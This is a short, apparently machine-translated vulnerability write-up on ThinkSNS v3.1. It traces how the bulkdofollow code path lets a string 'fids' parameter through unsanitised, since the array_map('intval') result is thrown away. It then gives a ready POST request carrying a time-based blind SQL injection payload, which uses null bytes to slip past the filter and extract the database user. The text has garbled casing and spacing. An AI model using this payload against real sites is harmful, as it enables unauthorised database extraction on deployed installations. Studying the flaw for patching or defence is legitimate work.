Thinksns Defense Bypass Idea (Union select true Unrestricted SQL injection)
PublicfunctionBulkdofollow () {
//Safe Filtering
$res=$this->_follow_model->bulkdofollow ($this->mid, T ($_post[' FIDS ']);
$this->ajaxreturn ($res,$this->_follow_model->geterror (),false!==$res);
}
Follow Bulkdofollow
PublicfunctionBulkdofollow ($uid,$fids) {
$follow _states=$this->getfollowstatebyfids ($uid,$fids);
Follow up: Getfollowstatebyfids
PublicfunctionGetfollowstatebyfids ($uid,$fids) {
Array_map(' Intval ',$fids);
$_fids=Is_array($fids) ?implode(‘,‘,$fids) :$fids;
if(Empty($_fids)) {
returnArray();
}
$follow _data=$this->where ("uid = ' {$uid} ' and FID in ({$_fids}) OR (uid in ({$_fids}) and FID = ' {$uid} ') ")->findall ();
$follow _states=$this->_formatfollowstate ($uid,$fids,$follow _data);
Look at the logic.
Array_map(' Intval ',$fids);
$_fids=Is_array($fids) ?implode(‘,‘,$fids) :$fids;
FIDS if it is a string
Array_map(' Intval ', "the"); This is going to be a warning, but the procedure is still going down.
So the injection is caused
Send URL:
http//Localhost/thinksns_v3.1_20131108_28822/index.php?app=public&mod=follow&act=bulkdofollow
PostData:
fids=1,2,if(ASCII (substr((sele%00ct User () Fr%00om ts_atme limit 0,1), slee%00p (3), 1)) =114,5,1)))#
Cause the whole station information can be guessed
Thinksns Defense Bypass Idea